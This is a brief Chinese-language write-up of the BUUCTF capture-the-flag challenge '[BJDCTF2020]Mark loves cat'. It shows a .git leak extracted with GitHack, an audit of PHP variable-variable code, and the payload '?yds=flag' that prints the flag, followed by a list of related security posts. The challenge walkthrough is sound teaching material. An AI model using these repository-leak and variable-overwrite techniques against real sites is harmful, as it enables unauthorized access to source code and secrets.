BUUCTF-[BJDCTF2020]Mark loves cat

对靶机进行目录扫描

发现有.git泄露

用githak提取.git文件

发现找到了两个文件

flag.php

利用$flag就可访问/flag文件

index.php

代码审计

perl 复制代码
echo "the flag is: ".$flag;

传入$flag就能获得flag

php 复制代码
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

要求get和post都不能有flag参数,就能传入$yds

php 复制代码
foreach($_GET as $x => $y){
    $$x = $$y;
}

当用get方式传入一个键值对的时候,能把键值分别转换为两个可变变量

当我们传入yds=flag时

通过这个foreach循环会变成yds=flag

构造payload

php 复制代码
?yds=flag
相关推荐
treesforest14 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
零零信安14 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
上海云盾第一敬业销售14 天前
深入解析WAF的工作原理与机制
web安全·ddos
憧憬成为web高手15 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub15 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
zhengfei61115 天前
小白级手册——全面剖析红队信息收集思考
网络·安全·web安全
爱网络爱Linux15 天前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp
xsc-xyc15 天前
用 Tailscale + Syncthing 实现手机、电脑与 NAS 的跨网络文件同步
linux·网络·网络安全·智能手机·电脑
持敬chijing15 天前
Web渗透之SQL注入-常用sql语句
sql·安全·web安全·网络安全
顾凌陵15 天前
Web安全二阶段综合测试:知识点速查与实战技巧
安全·web安全